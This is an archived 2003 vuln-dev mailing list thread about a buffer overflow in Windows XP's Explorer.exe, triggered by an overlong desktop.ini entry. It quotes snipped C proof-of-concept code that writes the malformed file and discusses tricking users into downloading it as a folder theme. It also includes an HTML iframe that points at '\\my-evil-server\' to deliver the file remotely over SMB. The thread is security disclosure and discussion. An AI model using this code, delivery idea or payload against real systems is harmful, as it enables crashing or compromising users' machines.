Re: Buffer overflow in Explorer.exe

From: Berend-Jan Wever (SkyLined_at_edup.tudelft.nl)
Date: 05/11/03

  • Next message: Berend-Jan Wever: "MSIE integer overflows"
    To: <vuln-dev@securityfocus.com>
    Date: Sun, 11 May 2003 19:55:46 +0200
    
    

    Could this not be done remotely without user interaction except browsing an
    evil website by using SMB ?
    <HTML><BODY>
      <IFRAME src="\\my-evil-server\">
    </BODY></HTML>
    You can make IE browse a harddisk which' contents you control...

    I don't have XP so I can't test this. Let me know what you find.

    Cheers,

    Berend-Jan Wever

    ----- Original Message -----
    From: "Kristopher Matthews" <krism@mailsnare.net>
    To: "'Ryan Yagatich'" <ryany@pantek.com>
    Cc: <vuln-dev@securityfocus.com>
    Sent: Friday, May 09, 2003 18:42
    Subject: RE: Buffer overflow in Explorer.exe

    I have tested and duplicated this behavior on a fully patched/updated
    Windows XP Pro system.

    1. The overflow is for that particular key, AFAICT.
    1a. It will not work for the root (c:/) directory; explorer.exe does not
    parse 'desktop.ini' for that directory. It will, however, work for any other
    directory.
    2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
    looks for all the world like a standard buffer overflow; I believe a more
    carefully crafted 'desktop.ini' file could be cause for explorer.exe to
    unintentionally execute arbitrary code.
    3. Download and execute untrusted code? Combine this with any of the other
    popular expoloits for windows; also, it wouldn't be terribly hard to get a
    user to download a 'desktop.ini' file to their "My Documents" directory (in
    the guise, of, say, a folder them, which windows does support; e.g.
    different background, file layout, etc); bam, whenever they open that
    directory, explorer crashes.

    Regards,
    Kristopher

    -----Original Message-----
    From: Ryan Yagatich [mailto:ryany@pantek.com]
    Sent: Thursday, May 08, 2003 6:28 PM
    To: at4r@3wdesign.es
    Cc: vuln-dev@securityfocus.com

    Hi,
    I don't quite understand the purpose behind this code. It creates
    a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
    contents of

    [.ShellClassInfo]
    AAAAAAAAAAAA {x2301}

    And then terminates? I don't have a windows machine available to
    really explore this any, but what makes that entry in desktop.ini cause
    this? Furthermore, is this issue only for that particular key or is it
    generally just key/excessive parameter/missing value size that is
    affected? And additionally, you mention that explorer will no longer be
    able to operate when trying to browse the hard disk, but does this mean
    globally, or when they try to browse the c:/ drive, or just that
    particular folder?
    Please send me more information about this, (even if it references
    past posts that I have missed) so that I can better understand the
    severity of this. Espcially since to me, I still see it as someone needing
    to download and execute untrusted software which causes a system crash,
    and if that were going to happen there are far worse things that can be
    done besides creating a small text file.

    Thanks,
    Ryan Yagatich

    ,_____________________________________________________,
    \ Ryan Yagatich support@pantek.com \
    / Pantek Incorporated (877) LINUX-FIX /
    \ http://www.pantek.com/security (440) 519-1802 \
    / Are your networks secure? Are you certain? /
    \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

    On Wed, 7 May 2003, aT4r InsaN3 wrote:

    >This bug allow a malicious an attacker to execute data with privileges of a

    >user that is browsing the hard disk with explorer.
    >
    >tested against winxp SP1
    >
    >example code provided.
    >
    <snip>
    >
    > strcpy(path,"\\aT4r[at]3WDesign.es Security");
    > mkdir(path);
    > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
    >
    > strcat(path,"\\desktop.ini");

    > bof=fopen(path,"w");
    > fputs("[.ShellClassInfo]\n",bof);
    > memset(evil,'A',BUFF);
    > fputs(evil,bof);
    > fclose(bof);
    <snip>


  • Next message: Berend-Jan Wever: "MSIE integer overflows"

    Relevant Pages

    • Re: McAfee Buffer Overflow - please help
      ... "To maintain system stability windows must restore original version of these files. ... Insert your window xp professional cd2 now" ... McAfee has automatically blocked a buffer overflow. ... Scroll all the way down to almost the bottom of the page and you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool". ...
      (microsoft.public.security.virus)
    • RE: Lost My Desktop
      ... Some of this does not apply if you have Windows XP SP2. ... Make sure of these settings and nothing will install without you ... Enable Install On Demand (Internet Explorer) ... [[Specifies to automatically download and install Web components if a Web ...
      (microsoft.public.windowsxp.general)
    • Re: Spyware possible being on one account and not the other
      ... > the browser in the guest account is jacked to some site. ... using Windows XP "prettifications". ... If you want to know when one of your applications is trying to obtain ... are pay - some you can only download if you are registered - but it is best ...
      (microsoft.public.windowsxp.security_admin)
    • Re: 16 Bit Error
      ... Something was wrong with the download. ... was just lumped in with whatever the Repair Install did. ... MS-MVP Windows Shell/User ... sure that the directory path exists, and disk space is available. ...
      (microsoft.public.windowsxp.help_and_support)
    • Re: [opensuse] Re: why /var/run and /run these two directories have absolutely the same contents?
      ... look and feel to Windows anyway; ... all or specific folders to download from the IMAP server to a local ...
      (SuSE)